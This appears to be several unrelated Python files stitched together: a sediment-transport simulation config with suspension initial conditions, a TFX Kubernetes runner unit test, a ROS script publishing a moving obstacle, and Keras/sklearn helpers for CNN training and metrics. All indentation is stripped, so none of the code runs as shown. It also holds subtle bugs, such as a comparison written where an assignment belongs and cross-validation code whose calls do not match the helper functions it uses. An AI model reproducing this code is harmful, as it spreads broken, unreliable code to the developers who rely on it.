ns_sed_lag_subgridError = True
ls_shockCapturingFactor = 0.9
ls_lag_shockCapturing = True
ls_sc_uref = 1.0
ls_sc_beta = 1.0
vof_shockCapturingFactor = 0.9
vof_lag_shockCapturing = True
vof_sc_uref = 1.0
vof_sc_beta = 1.0
vos_shockCapturingFactor = 0.9
vos_lag_shockCapturing = True
vos_sc_uref = 1.0
vos_sc_beta = 1.0
rd_shockCapturingFactor = 0.9
rd_lag_shockCapturing = False
epsFact_density = opts.epsFact_density # 1.5
epsFact_viscosity = epsFact_curvature = epsFact_vof = epsFact_vos = epsFact_consrv_heaviside = epsFact_consrv_dirac = epsFact_density
epsFact_redistance = 0.33
epsFact_consrv_diffusion = opts.epsFact_consrv_diffusion # 1.0
redist_Newton = False
kappa_shockCapturingFactor = 0.9
kappa_lag_shockCapturing = True #False
kappa_sc_uref = 1.0
kappa_sc_beta = 1.0
dissipation_shockCapturingFactor = 0.9
dissipation_lag_shockCapturing = True #False
dissipation_sc_uref = 1.0
dissipation_sc_beta = 1.0
ns_nl_atol_res = max(opts.res, 0.001 * he ** 2)
ns_sed_nl_atol_res = max(opts.res, 0.001 * he ** 2)
vof_nl_atol_res = max(opts.res, 0.001 * he ** 2)
vos_nl_atol_res = max(opts.res, 0.001 * he ** 2)
ls_nl_atol_res = max(opts.res, 0.001 * he ** 2)
rd_nl_atol_res = max(opts.res, 0.005 * he)
mcorr_nl_atol_res = max(opts.res, 0.001 * he ** 2)
kappa_nl_atol_res = max(opts.res, 0.001 * he ** 2)
dissipation_nl_atol_res = max(opts.res, 0.001 * he ** 2)
phi_nl_atol_res = max(opts.res, 0.001 * he ** 2)
pressure_nl_atol_res = max(opts.res, 0.001 * he ** 2)
####################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
# Turbulence
####################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
ns_closure = 0 #1-classic smagorinsky, 2-dynamic smagorinsky, 3 -- k-epsilon, 4 -- k-omega
ns_sed_closure = 0 #1-classic smagorinsky, 2-dynamic smagorinsky, 3 -- k-epsilon, 4 -- k-omega
if useRANS == 1:
ns_closure = 3
elif useRANS == 2:
ns_closure == 4
####################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
# Functions for model variables - Initial conditions
####################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
def signedDistance(x):
phi_z = x[1] - waterLine_z
return phi_z
def vos_signedDistance(x):
phi_z = x[1] - 0.75*waterLine_z
return phi_z
class Suspension_class:
def __init__(self):
pass
def uOfXT(self, x, t=0):
phi = signedDistance(x) + 0.1
phiBottom = x[1] - 0.05
phiLeft = x[0] - 0.8
phiRight = x[0] - (dimx-0.8)
smoothing = (epsFact_consrv_heaviside)*he/2.
Heav = smoothedHeaviside(smoothing, phi)
HeavBottom = smoothedHeaviside(smoothing, phiBottom)
HeavLeft = smoothedHeaviside(smoothing, phiLeft)
HeavRight = smoothedHeaviside(smoothing, phiRight)
if phiLeft>=smoothing and phiRight<=-smoothing:
if phi <= -smoothing:
if phiBottom >= smoothing:
return opts.cSed
elif -smoothing < phiBottom < smoothing :
return opts.cSed * (HeavBottom)
else:
return 1e-10
elif -smoothing < phi < smoothing:
return opts.cSed * (1.-Heav)
else:
return 1e-10
elif -smoothing < phiLeft < smoothing:
if phi <= 0.0 and phiBottom >= 0.0:
return opts.cSed * (HeavLeft)
elif 0. < phi < smoothing:
return opts.cSed * (1.-Heav)
elif 0. > phiBottom > -smoothing:
return opts.cSed * (HeavBottom)
else:
return 1e-10
elif -smoothing < phiRight < smoothing:
if phi <= 0.0 and phiBottom >= 0.0:
return opts.cSed * (1.-HeavRight)
elif 0. < phi < smoothing:
return opts.cSed * (1.-Heav)
elif 0. > phiBottom > -smoothing:
return opts.cSed * (HeavBottom)
else:
return 1e-10
else:
return 1e-10
def vos_function(x, t=0):
phi = signedDistance(x) + 0.1
phiBottom = x[1] - 0.05
phiLeft = x[0] - 0.8
phiRight = x[0] - (dimx-0.8)
smoothing = (epsFact_consrv_heaviside)*he/2.
Heav = smoothedHeaviside(smoothing, phi)
HeavBottom = smoothedHeaviside(smoothing, phiBottom)
HeavLeft = smoothedHeaviside(smoothing, phiLeft)
HeavRight = smoothedHeaviside(smoothing, phiRight)
if phiLeft>=smoothing and phiRight<=-smoothing:
if phi <= -smoothing:
if phiBottom >= smoothing:
return opts.cSed
elif -smoothing < phiBottom < smoothing :
return opts.cSed * (HeavBottom)
else:
return 1e-10
elif -smoothing < phi < smoothing:
return opts.cSed * (1.-Heav)
else:
return 1e-10
elif -smoothing < phiLeft < smoothing:
if phi <= 0.0 and phiBottom >= 0.0:
return opts.cSed * (HeavLeft)
elif 0. < phi < smoothing:
return opts.cSed * (1.-Heav)
elif 0. > phiBottom > -smoothing:
return opts.cSed * (HeavBottom)
else:
return 1e-10
elif -smoothing < phiRight < smoothing:
if phi <= 0.0 and phiBottom >= 0.0:
return opts.cSed * (1.-HeavRight)
elif 0. < phi < smoothing:
return opts.cSed * (1.-Heav)
elif 0. > phiBottom > -smoothing:
return opts.cSed * (HeavBottom)
else:
return 1e-10
else:
return 1e-10
Suspension = Suspension_class()
|
<filename>tfx/components/infra_validator/model_server_runners/kubernetes_runner_test.py
# Lint as: python2, python3
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tfx.components.infra_validator.model_server_runners.kubernetes_runner."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from typing import Any, Dict, Text
from kubernetes import client as k8s_client
from kubernetes.client import rest
import mock
import tensorflow as tf
from google.protobuf import json_format
from tfx.components.infra_validator import error_types
from tfx.components.infra_validator import serving_bins
from tfx.components.infra_validator.model_server_runners import kubernetes_runner
from tfx.proto import infra_validator_pb2
from tfx.types import standard_artifacts
from tfx.utils import kube_utils
from tfx.utils import path_utils
def _create_serving_spec(payload: Dict[Text, Any]):
result = infra_validator_pb2.ServingSpec()
json_format.ParseDict(payload, result)
return result
class KubernetesRunnerTest(tf.test.TestCase):
def setUp(self):
super(KubernetesRunnerTest, self).setUp()
self.addCleanup(mock.patch.stopall)
self._base_dir = os.path.join(
os.path.dirname( # components/
os.path.dirname( # infra_validator/
os.path.dirname(__file__))), # model_server_runners/
'testdata'
)
self._model = standard_artifacts.Model()
self._model.uri = os.path.join(self._base_dir, 'trainer', 'current')
self._model_name = 'chicago-taxi'
# Prepare mocks
self._mock_sleep = mock.patch('time.sleep').start()
self._mock_core_v1_api = mock.patch.object(
kube_utils, 'make_core_v1_api').start().return_value
def _CreateKubernetesRunner(self, k8s_config_dict=None):
self._serving_spec = infra_validator_pb2.ServingSpec()
json_format.ParseDict({
'tensorflow_serving': {
'tags': ['1.15.0']},
'kubernetes': k8s_config_dict or {},
'model_name': self._model_name,
}, self._serving_spec)
serving_binary = serving_bins.parse_serving_binaries(self._serving_spec)[0]
return kubernetes_runner.KubernetesRunner(
model_path=path_utils.serving_model_path(self._model.uri),
serving_binary=serving_binary,
serving_spec=self._serving_spec)
def _AssumeInsideKfp(
self,
namespace='my-namespace',
pod_name='my-pod-name',
pod_uid='my-pod-uid',
pod_service_account_name='my-service-account-name',
with_pvc=False):
pod = k8s_client.V1Pod(
api_version='v1',
kind='Pod',
metadata=k8s_client.V1ObjectMeta(
name=pod_name,
uid=pod_uid,
),
spec=k8s_client.V1PodSpec(
containers=[
k8s_client.V1Container(
name='main',
volume_mounts=[]),
],
volumes=[]))
if with_pvc:
pod.spec.volumes.append(
k8s_client.V1Volume(
name='my-volume',
persistent_volume_claim=k8s_client
.V1PersistentVolumeClaimVolumeSource(
claim_name='my-pvc')))
pod.spec.containers[0].volume_mounts.append(
k8s_client.V1VolumeMount(
name='my-volume',
mount_path=self._base_dir))
mock.patch.object(kube_utils, 'is_inside_kfp', return_value=True).start()
pod.spec.service_account_name = pod_service_account_name
mock.patch.object(kube_utils, 'get_current_kfp_pod',
return_value=pod).start()
mock.patch.object(kube_utils, 'get_kfp_namespace',
return_value=namespace).start()
if with_pvc:
(self._mock_core_v1_api.read_namespaced_persistent_volume_claim
.return_value) = k8s_client.V1PersistentVolumeClaim(
metadata=k8s_client.V1ObjectMeta(
name='my-pvc'),
spec=k8s_client.V1PersistentVolumeClaimSpec(
access_modes=['ReadWriteMany']))
def _AssumeOutsideKfp(self):
mock.patch.object(kube_utils, 'is_inside_kfp', return_value=False).start()
def testStart_InsideKfp(self):
# Prepare mocks and variables.
self._AssumeInsideKfp(namespace='vanilla-latte')
runner = self._CreateKubernetesRunner()
# Act.
runner.Start()
# Check states.
self._mock_core_v1_api.create_namespaced_pod.assert_called()
_, kwargs = self._mock_core_v1_api.create_namespaced_pod.call_args
self.assertEqual(kwargs['namespace'], 'vanilla-latte')
self.assertTrue(runner._pod_name)
def testBuildPodManifest_InsideKfp(self):
# Prepare mocks and variables.
self._AssumeInsideKfp(
namespace='strawberry-latte',
pod_name='green-tea-latte',
pod_uid='chocolate-latte',
pod_service_account_name='van<PASSWORD>')
runner = self._CreateKubernetesRunner()
# Act.
pod_manifest = runner._BuildPodManifest()
# Check result.
self.assertEqual(
pod_manifest.metadata.generate_name, 'tfx-infraval-modelserver-')
self.assertEqual(pod_manifest.metadata.labels, {
'app': 'tfx-infraval-modelserver'
})
owner_ref = pod_manifest.metadata.owner_references[0]
self.assertEqual(owner_ref.name, 'green-tea-latte')
self.assertEqual(owner_ref.uid, 'chocolate-latte')
self.assertEqual(pod_manifest.spec.service_account_name, 'vanilla-latte')
self.assertEqual(pod_manifest.spec.restart_policy, 'Never')
container = pod_manifest.spec.containers[0]
self.assertEqual(container.name, 'model-server')
self.assertEqual(container.image, 'tensorflow/serving:1.15.0')
container_envs = {env.name for env in container.env}
self.assertIn('MODEL_NAME', container_envs)
self.assertIn('MODEL_BASE_PATH', container_envs)
def testBuildPodManifest_InsideKfp_WithPvc(self):
# Prepare mocks and variables.
self._AssumeInsideKfp(with_pvc=True)
runner = self._CreateKubernetesRunner()
# Act.
pod_manifest = runner._BuildPodManifest()
# Check Volume.
volume = pod_manifest.spec.volumes[0]
self.assertEqual(volume.name, 'model-volume')
self.assertEqual(volume.persistent_volume_claim.claim_name, 'my-pvc')
# Check VolumeMount.
container = pod_manifest.spec.containers[0]
volume_mount = container.volume_mounts[0]
self.assertEqual(volume_mount.name, 'model-volume')
self.assertEqual(volume_mount.mount_path, self._base_dir)
def testBuildPodManifest_InsideKfp_OverrideConfig(self):
# Prepare mocks and variables.
self._AssumeInsideKfp()
runner = self._CreateKubernetesRunner(k8s_config_dict={
'service_account_name': 'chocolate-latte',
'active_deadline_seconds': 123,
})
# Act.
pod_manifest = runner._BuildPodManifest()
# Check result.
self.assertEqual(pod_manifest.spec.service_account_name, 'chocolate-latte')
self.assertEqual(pod_manifest.spec.active_deadline_seconds, 123)
def testStart_FailsIfOutsideKfp(self):
# Prepare mocks and variables.
self._AssumeOutsideKfp()
# Act.
with self.assertRaises(NotImplementedError):
self._CreateKubernetesRunner()
def testStart_FailsIfStartedTwice(self):
# Prepare mocks and variables.
self._AssumeInsideKfp()
runner = self._CreateKubernetesRunner()
# Act.
runner.Start()
with self.assertRaises(AssertionError):
runner.Start()
@mock.patch('time.time')
def testWaitUntilRunning(self, mock_time):
# Prepare mocks and variables.
self._AssumeInsideKfp()
runner = self._CreateKubernetesRunner()
mock_time.side_effect = list(range(20))
pending_pod = mock.Mock()
pending_pod.status.phase = 'Pending'
running_pod = mock.Mock()
running_pod.status.phase = 'Running'
self._mock_core_v1_api.read_namespaced_pod.side_effect = [
rest.ApiException('meh'), # Error is tolerable.
pending_pod,
pending_pod,
running_pod
]
# Act.
runner.Start()
try:
runner.WaitUntilRunning(deadline=10)
except Exception as e: # pylint: disable=broad-except
self.fail(e)
# Check calls.
self.assertEqual(self._mock_core_v1_api.read_namespaced_pod.call_count, 4)
def testWaitUntilRunning_FailsIfNotStarted(self):
# Prepare mocks and variables.
self._AssumeInsideKfp()
runner = self._CreateKubernetesRunner()
# Act.
with self.assertRaises(AssertionError):
runner.WaitUntilRunning(deadline=10)
@mock.patch('time.time')
def testWaitUntilRunning_FailsIfJobAborted(self, mock_time):
# Prepare mocks and variables.
self._AssumeInsideKfp()
runner = self._CreateKubernetesRunner()
mock_time.side_effect = list(range(20))
terminated_pod = mock.Mock()
terminated_pod.status.phase = 'Succeeded'
self._mock_core_v1_api.read_namespaced_pod.return_value = terminated_pod
# Act.
runner.Start()
with self.assertRaises(error_types.JobAborted):
runner.WaitUntilRunning(deadline=10)
@mock.patch('time.time')
def testWaitUntilRunning_FailsIfDeadlineExceeded(self, mock_time):
# Prepare mocks and variables.
self._AssumeInsideKfp()
runner = self._CreateKubernetesRunner()
mock_time.side_effect = list(range(20))
pending_pod = mock.Mock()
pending_pod.status.phase = 'Pending'
self._mock_core_v1_api.read_namespaced_pod.return_value = pending_pod
# Act.
runner.Start()
with self.assertRaises(error_types.DeadlineExceeded):
runner.WaitUntilRunning(deadline=10)
def testStop(self):
# Prepare mocks and variables.
self._AssumeInsideKfp()
runner = self._CreateKubernetesRunner()
# Act.
try:
runner.Start()
runner.Stop()
except Exception as e: # pylint: disable=broad-except
self.fail(e)
# Check calls.
self._mock_core_v1_api.delete_namespaced_pod.assert_called_once()
def testStop_RetryIfApiException(self):
# Prepare mocks and variables.
self._AssumeInsideKfp()
runner = self._CreateKubernetesRunner()
self._mock_core_v1_api.delete_namespaced_pod.side_effect = rest.ApiException
# Act.
try:
runner.Start()
runner.Stop()
except Exception as e: # pylint: disable=broad-except
self.fail(e)
# Check calls.
self.assertEqual(self._mock_sleep.call_count, 4)
self.assertEqual(self._mock_core_v1_api.delete_namespaced_pod.call_count, 5)
if __name__ == '__main__':
tf.test.main()
|
<reponame>FranzAlbers/teb_local_planner
#!/usr/bin/env python
# Author: <EMAIL>
import rospy, math, tf
from teb_local_planner.msg import ObstacleMsg
from geometry_msgs.msg import PolygonStamped, Point32, QuaternionStamped, Quaternion, TwistWithCovariance
from tf.transformations import quaternion_from_euler
def publish_obstacle_msg():
pub = rospy.Publisher('/test_optim_node/obstacles', ObstacleMsg, queue_size=1)
#pub = rospy.Publisher('/p3dx/move_base/TebLocalPlannerROS/obstacles', ObstacleMsg, queue_size=1)
rospy.init_node("test_obstacle_msg")
y_0 = -3.0
vel_x = 0.0
vel_y = 0.3
range_y = 6.0
obstacle_msg = ObstacleMsg()
obstacle_msg.header.stamp = rospy.Time.now()
obstacle_msg.header.frame_id = "map" # CHANGE HERE: odom/map
# Add point obstacle
obstacle_msg.obstacles.append(PolygonStamped())
obstacle_msg.obstacles[0].polygon.points = [Point32()]
obstacle_msg.obstacles[0].polygon.points[0].x = -1.5
obstacle_msg.obstacles[0].polygon.points[0].y = 0
obstacle_msg.obstacles[0].polygon.points[0].z = 0
yaw = math.atan2(vel_y, vel_x)
q = tf.transformations.quaternion_from_euler(0,0,yaw)
quat = Quaternion(*q)
obstacle_msg.orientations.append(QuaternionStamped())
obstacle_msg.orientations[0].header.stamp = obstacle_msg.header.stamp
obstacle_msg.orientations[0].header.frame_id = obstacle_msg.header.frame_id
obstacle_msg.orientations[0].quaternion = quat
obstacle_msg.velocities.append(TwistWithCovariance())
obstacle_msg.velocities[0].twist.linear.x = vel_x
obstacle_msg.velocities[0].twist.linear.y = vel_y
obstacle_msg.velocities[0].twist.linear.z = 0
obstacle_msg.velocities[0].twist.angular.x = 0
obstacle_msg.velocities[0].twist.angular.y = 0
obstacle_msg.velocities[0].twist.angular.z = 0
# Add line obstacle
#obstacle_msg.obstacles.append(PolygonStamped())
#line_start = Point32()
#line_start.x = -2.5
#line_start.y = 0.5
#line_start.y = -3
#line_end = Point32()
#line_end.x = -2.5
#line_end.y = 2
#line_end.y = -4
#obstacle_msg.obstacles[1].polygon.points = [line_start, line_end]
# Add polygon obstacle
#obstacle_msg.obstacles.append(PolygonStamped())
#v1 = Point32()
#v1.x = -1
#v1.y = -1
#v2 = Point32()
#v2.x = -0.5
#v2.y = -1.5
#v3 = Point32()
#v3.x = 0
#v3.y = -1
#obstacle_msg.obstacles[2].polygon.points = [v1, v2, v3]
r = rospy.Rate(10) # 10hz
t = 0.0
while not rospy.is_shutdown():
# Vary y component of the point obstacle
if (vel_y >= 0):
obstacle_msg.obstacles[0].polygon.points[0].y = y_0 + (vel_y*t)%range_y
else:
obstacle_msg.obstacles[0].polygon.points[0].y = y_0 + (vel_y*t)%range_y - range_y
t = t + 0.1
pub.publish(obstacle_msg)
r.sleep()
if __name__ == '__main__':
try:
publish_obstacle_msg()
except rospy.ROSInterruptException:
pass
|
import numpy as np
import pandas as pd
import pickle
import seaborn as sns
import matplotlib.pyplot as plt
from IPython.display import clear_output
from sklearn.preprocessing import MinMaxScaler, StandardScaler
from sklearn.model_selection import train_test_split
from sklearn.metrics import confusion_matrix
from sklearn.utils.multiclass import unique_labels
from sklearn.metrics import f1_score, precision_score, recall_score, roc_auc_score
from sklearn.metrics import average_precision_score
from sklearn.metrics import precision_recall_curve, plot_precision_recall_curve
from sklearn.metrics import classification_report, confusion_matrix
import pprint
import tensorflow as tf
from tensorflow import keras
class PlotLosses(keras.callbacks.Callback):
"""
Keras Callback to plot the training loss and accuracy of the training and validation sets.
"""
def __init__(self, metrics):
self.i = 0
self.epoch = []
self.metrics_names = metrics
self.metrics = {}
for name in self.metrics_names:
self.metrics[name] = []
self.metrics['val_'+name] = []
self.fig = plt.figure()
self.logs = []
self.tf_version = float(tf.__version__[:3])
def on_epoch_end(self, epoch, logs={}):
self.logs.append(logs)
self.epoch.append(self.i)
# extract the metrics from the logs
for name in self.metrics_names:
# get the training metric
tr_value = logs.get(name)
# get the validation metric
try:
val_value = logs.get('val_'+name)
except:
val_value = 0.0
# store the metric: for f1-score we get two values one for each class.
# We only want the value for the positive class
self.metrics[name].append(tr_value)
self.metrics['val_'+name].append(val_value)
self.i += 1
f, axes = plt.subplots(len(self.metrics_names), 1, sharex=True,
figsize=(12, 4 * len(self.metrics_names)))
clear_output(wait=True)
for name, ax in zip(self.metrics_names, axes):
ax.plot(self.epoch, self.metrics.get(name), label=name)
ax.plot(self.epoch, self.metrics.get('val_'+name), label="val "+name)
ax.legend()
axes[-1].set_xlabel("Epoch")
plt.show()
def print_confusion_matrix(confusion_matrix, class_names, activities,
figsize = (12, 6), fontsize=10):
"""
Prints a confusion matrix, as returned by sklearn.metrics.confusion_matrix, as a heatmap.
Arguments
---------
confusion_matrix: numpy.ndarray
The numpy.ndarray object returned from a call to sklearn.metrics.confusion_matrix.
Similarly constructed ndarrays can also be used.
class_names: list
An ordered list of class names, in the order they index the given confusion matrix.
figsize: tuple
A 2-long tuple, the first value determining the horizontal size of the output figure,
the second determining the vertical size. Defaults to (10,7).
fontsize: int
Font size for axes labels. Defaults to 14.
Returns
-------
matplotlib.figure.Figure
The resulting confusion matrix figure
"""
df_cm = pd.DataFrame(
confusion_matrix, index=class_names, columns=class_names,
)
try:
heatmap = sns.heatmap(df_cm, annot=True, fmt="d", cmap='Blues')
except ValueError:
raise ValueError("Confusion matrix values must be integers.")
fig = fig = plt.gcf()
heatmap.yaxis.set_ticklabels(activities, rotation=0, ha='right', fontsize=fontsize)
heatmap.xaxis.set_ticklabels(activities, rotation=90, ha='right', fontsize=fontsize)
plt.show()
def get_features_labels_from_df(data_df, shape_y, shape_z):
"""
Given a dataframe with class as column, separate the features and class label
and normalize the feature with min-max scaler and encode label as one-hot
vector.
Arguments:
data_df (pandas DataFrame): dataframe
shape_y (int) : Number of channels for the sensor data
shape_z (int) : Length of the window segment
Returns:
Normalized features in the range (-1.0, 1.0), label, and one hot encoded label
"""
labels = data_df['Class'].values.astype(int)
features = data_df.drop(['Class'], axis = 1).values
scaler = MinMaxScaler(feature_range=(-1.0, 1.0))
features = scaler.fit_transform(features)
features = features.reshape(-1, shape_y, shape_z)
features = np.transpose(features, (0, 2, 1))
labels_one_hot = keras.utils.to_categorical(labels, np.max(labels)+1)
return features, labels, labels_one_hot
def min_max_scale(data):
"""
Min-Max scale the data in the range [-1.0, 1.0]
The data is expected to have the shape (n_samples, segment_length, n_channels)
Return the scaled data in the original shape.
"""
_, segment_length, n_channels = data.shape
# flatten the data
features = data.reshape(-1, segment_length * n_channels)
# scale the data
scaler = MinMaxScaler(feature_range=(-1.0, 1.0))
features = scaler.fit_transform(features)
# reshape the data
features = features.reshape(-1, n_channels, segment_length)
features = np.transpose(features, (0, 2, 1))
return features
def standard_scaler(data):
""" Normalize the data to have zero mean and unit standard devication
The data is expected to have the shape (n_samples, segment_length, n_channels)
Return the scaled data in the original shape.
"""
_, segment_length, n_channels = data.shape
# flatten the data
features = data.reshape(-1, segment_length * n_channels)
# scale the data
scaler = StandardScaler(with_mean=False, with_std=False)
features = scaler.fit_transform(features)
# reshape the data
features = features.reshape(-1, n_channels, segment_length)
features = np.transpose(features, (0, 2, 1))
return features
def get_cnn_model(input_shape, n_output_classes, learning_rate):
"""
Returns a 1D CNN model with arch 100 - 50 - GlobalMaxPool1D - 64 - Dropout(0.3) - n_classes.
We have used this 1D CNN model extensively in Adversarial research projects.
Arguments:
input_shape (tuple) : Shape of the input
n_output_classes (int) : number of output classes
learning_rate (float) : learning rate for the Adam optimizer
Returns:
A 1D CNN model ready for training, with categorical cross entropy loss and Adam optimizer.
"""
temp_model = keras.Sequential([
keras.layers.Conv1D(filters = 100, kernel_size = (10), strides = 2, activation = tf.nn.relu, input_shape = input_shape),
keras.layers.Conv1D(filters = 50, kernel_size = (5), strides = 1, activation = tf.nn.relu),
keras.layers.GlobalMaxPool1D(),
#keras.layers.Flatten(),
keras.layers.Dense(units = 64, activation = tf.nn.relu),
keras.layers.Dropout(rate = 0.3),
keras.layers.Dense(units = n_output_classes, activation = tf.nn.softmax)
])
temp_model.compile(loss = keras.losses.categorical_crossentropy, optimizer = keras.optimizers.Adam(learning_rate=learning_rate),
metrics = ['accuracy'])
return temp_model
def save_data(path, data):
"""
Given a path and data, save the data to the path as a pickle file.
Arguments:
path (string) : file path with .pkl extension
data : data values; can be a single container or multiple containers
"""
f = open(path, "wb")
pickle.dump(data, f)
f.close()
def read_data(path, n_vaues=None):
"""
Given a path, read the file and return the contents.
Arguments:
path (string) : File path with .pkl extension
n_values (int) : Number of containers expected to be read.
"""
f = open(path, "rb")
d = pickle.load(f)
f.close()
return d
def stylize_axis(ax, xticks=True, yticks=False, top_right_spines=True,
bottom_left_spines=False):
"""
Given an axis, stylize it by removing ticks and spines. Default choice for
ticks and spines are given. Modify as needed.
Arguments:
ax (matplotlib.axes.Ax): matplotlib axis
xticks (Boolean): whether to make xticks visible or not (True by Default)
yticks (Boolean): whether to make yticks visible or not (False by Default)
top_right_spines (Boolean): whether to make top_right_spines visible or not (True by Default)
bottom_left_spines (Boolean): whether to make bottom_left_spines visible or not (False by Default)
"""
if xticks:
ax.set_xticks([])
if yticks:
ax.set_yticks([])
if top_right_spines:
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
if bottom_left_spines:
ax.spines['left'].set_visible(False)
ax.spines['bottom'].set_visible(False)
def print_metrics(met_dict):
"""
Given a metrics dictionary, print the values.
"""
print("Loss: {:.3f}".format(met_dict['Loss']))
print("Accuracy: {:.3f} %".format(met_dict['Accuracy'] * 100))
print("Precision score: {:.3f}".format(met_dict['Precision']))
print("Recall score: {:.3f}".format(met_dict["Recall"]))
print("F1 score: {:.3f}".format(met_dict['F1 Score']))
print("ROC AUC: {:.3f}".format(met_dict['ROC AUC']))
def precision_recall_f1_score(y_true, y_pred):
""" Compute precision, recall, and f1 score given y and y predicted.
y_true and y_pred are labels (not hot encoded)
Return a dictionary containing Precision, Recall, and F1 Score
"""
# whether binary or multi-class classification
if len(np.unique(y_true)) == 2:
average_case = 'binary'
else:
average_case = 'macro'
recall = recall_score(y_true, y_pred, average=average_case)
precision = precision_score(y_true, y_pred, average=average_case)
print(f"Precision {precision} \nRecall {recall}")
f1_score_cal = f1_score(y_true, y_pred, average=average_case)
print("F1 score {:.3f}, with formula {:.3f}".format(f1_score_cal,
2 * ((precision * recall) / (precision + recall))))
return {'Precision': precision, 'Recall': recall, 'F1 Score': f1_score_cal}
def compute_performance_metrics(model, x, y, metric_names):
"""
Given a model (TensorFlow) and (x, y), we compute accuracy, loss, True Positive, False Negative,
False Positive, True Negative, Recall, Precision, f1 score, Average Precision Recall, ROC AUC,
and classification report.
Arguments:
model: tensorflow model
x: feature vector
y: label vector (one hot encoded)
Returns: A dictionary containint, Accuracy, Loss, True Positive, False Positive, False Negative,
True Negative, Recall, Precision, f1 score, roc_auc_score
"""
y_true = np.argmax(y, axis=1)
if len(np.unique(y_true)) > 2:
print("This only works for binary classification")
return {}
# get the metrics
metrics = model.evaluate(x, y)
rt = dict()
for name, val in zip(metric_names, metrics):
rt[name] = val
# the loss is always at first position and accuracy the second
loss, acc = metrics[0], metrics[1] * 100
print("Accuracy {:.3f}, Loss {:.3f}".format(acc, loss))
y_probs = model.predict(x)
y_pred = np.argmax(y_probs, axis=1)
tp, fp, tn, fn = (0, 0, 0, 0)
try:
# we can only do this in binary case
tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()
except:
print("Not a binary classification problem")
print("True Positive ", tp)
print("False Positive ", fp)
print("True Negative ", tn)
print("False Negative ", fn)
recall = recall_score(y_true, y_pred)
precision = precision_score(y_true, y_pred)
print("Recall {:.3f}, with formula {:.3f}".format(recall, (tp / (tp + fn))))
print("Precision {:.3f}, with formula {:.3f}".format(precision, (tp / (tp + fp))))
f1_score_cal = f1_score(y_true, y_pred)
print("F1 score {:.3f}, with formula {:.3f}".format(f1_score_cal,
2 * ((precision * recall) / (precision + recall))))
print("Average precision score {:.3f}".format(average_precision_score(y_true, y_pred)))
roc_auc = roc_auc_score(y_true, y_pred)
print("ROC AUC Score {:.3f}".format(roc_auc))
clf_report = classification_report(y_true, y_pred, output_dict=True)
pprint.pprint(clf_report)
# print(clf_report.keys())
rt_dict = {'Accuracy': acc,
'Loss': loss,
'True Positive': tp,
'False Positive': fp,
'True Negative': tn,
'False Negative': fn,
'Recall': recall,
'Precision': precision,
'F1 Score': f1_score_cal,
'ROC AUC': roc_auc
}
return rt_dict
def split_into_train_test(X, Y, test_split = 0.25):
"""
Given data (X, Y), split the data into training and testing sets.
Validation is 10 percent of the training set.
Arguments:
X (numpy.ndarray): Data vector
Y (numpy.ndarray): Label vector
test_split (float): Test split (0.25 by default)
Returns:
x_train, y_train, x_test, and y_test
"""
if len(X) != len(Y):
raise ValueError("X and Y must be the same length")
# split the data
random_state = 42
x_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=test_split, random_state=random_state,
shuffle=True, stratify=Y)
# x_val = np.array([])
# y_val = np.array([])
# if val_split > 0.0:
# x_train, x_val, y_train, y_val = train_test_split(x_train, y_train, test_size=val_split, random_state=random_state,
# shuffle=True, stratify=y_train)
print("Training set {} \nTest set {}".format(x_train.shape, x_test.shape))
return x_train, x_test, y_train, y_test
def select_random_samples(data, n_samples):
"""
@brief: Select n_samples random samples from the data
@param: data (array)
@param: n_samples (int) Number of samples to randomly select from the data.
@return: Randomly selected samples
"""
length = data.shape[0]
print(length, n_samples)
if n_samples >= length:
return data
else:
random_index = np.random.randint(low=0, high=length, size=n_samples)
return data[random_index]
def get_hot_labels(Y):
"""
Given label vector, return the one hot encoded label vector.
Arguments:
Y (numpy.ndarray): label vector
Returns:
One hot encoded label vector.
"""
return keras.utils.to_categorical(Y, np.max(Y) + 1, dtype=int)
def find_min_max(X):
""" Return the minimum and maximum value of X """
return np.min(X), np.max(X)
def load_data_with_preprocessing(data_path):
"""
Given a data path, load the data (must be in the format (X, Y)) and
scale the X in range [-1.0, 1.0] and return scaled x and y.
Arguments:
data_path (string): Pickle file path
Returns:
(X, Y)
"""
# load the file
f = open(data_path, "rb")
try:
x, y = pickle.load(f)
f.close()
except:
f.close()
return
# check for same length
if len(x) != len(y):
raise ValueError("Unequal X and Y sizes")
# print(x.shape, y.shape)
# wherenane = np.argwhere(np.isnan(x))[:, 1]
# print(np.unique(wherenane, return_counts=True))
# do we need preprocessing
print("Before Scaling: Min - Max {}".format(find_min_max(x)))
scaler = MinMaxScaler((-1.0, 1.0))
x = scaler.fit_transform(x)
print("After Scaling: Min - Max {}".format(find_min_max(x)))
return x, y
def cross_validation(model_function, X, Y, n_CV, test_split, val_split, batch_size=32, epochs=50):
"""
@brief: Do cross validation for n_CV times and returns the results.
@param: model_function : A function that returns the model after calling it.
@param: X (array): Total data
@param: Y (array): Total label
@param: test_split (float): The percentage of samples to be included in the test set
@param: val_split (float): The percentage of samples to be included in the validation set.
@param: batch_size (int): Default 32
@param: epochs (int): Default 50
@return: Results of the cross validation, a dictionary
"""
x_tr, x_val, x_ts, y_tr, y_val, y_ts = split_into_train_test(X, Y, test_split, val_split=0.0)
y_tr_hot = get_hot_labels(y_tr)
y_ts_hot = get_hot_labels(y_ts)
results_dict = {}
metrics_arr = []
for i in range(n_CV):
model = model_function()
results = evaluate_model(model, x_tr, y_tr_hot, x_ts, y_ts_hot, validation_split=val_split,
batch_size=batch_size, epochs=epochs)
metrics_arr.append(results)
train_report = compute_performance_metrics(model, x_tr, y_tr)
test_report = compute_performance_metrics(model, x_ts, y_ts)
results_dict[i] = {"Training Loss": results[0], "Training Accuracy": results[1],
"Test Loss": results[2], "Test Accuracy": results[3],
